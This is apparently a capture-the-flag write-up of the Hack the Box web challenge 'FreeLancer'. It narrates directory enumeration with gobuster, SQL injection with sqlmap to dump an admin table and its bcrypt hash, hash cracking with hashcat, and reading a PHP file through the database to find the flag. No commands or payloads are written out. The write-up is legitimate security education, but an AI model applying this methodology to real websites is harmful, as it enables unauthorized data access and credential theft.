Hack the Box: FreeLancer

Challenge Lab: Web

Difficulty: Medium

“Can you test how secure my website is? Prove me wrong and capture the flag!”

Let’s start by pulling up the website:

I ran gobuster on the webpage to find more directories:

At /administrat, there is a login page:

And at /portfolio.php there is a log cabin image:

After doing some tests, I am going to use sqlmap to try some SQL Injection techniques.

You can choose “Y” for the prompts, and eventually it will spit out some data tables:

We can dump them further. The portfolio table just contained some basic website stuff, but the safeadmin table contained a bit more:

That password looks like bcrypt. Let’s throw it in hashcat. Sometimes bcrypt can take a LONG time to crack though, so while that is going I will attempt further enumeration:

I assume I am going to be using these credentials for that administrator page I found earlier. I ran gobuster on that page to see if I could get anything further from it:

I noticed that when I navigated to /panel.php I kept being redirected to /index.php. I tried to download panel.php with mysql.

Here it shows that it was downloaded and saved to my computer:

Let’s open up that file location:

You will find the flag nestled in there near the bottom! So there was no need to decrypt that password after all.

Happy Hacking! ❤

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Samantha

Samantha

CTF Writeups to facilitate cyber education.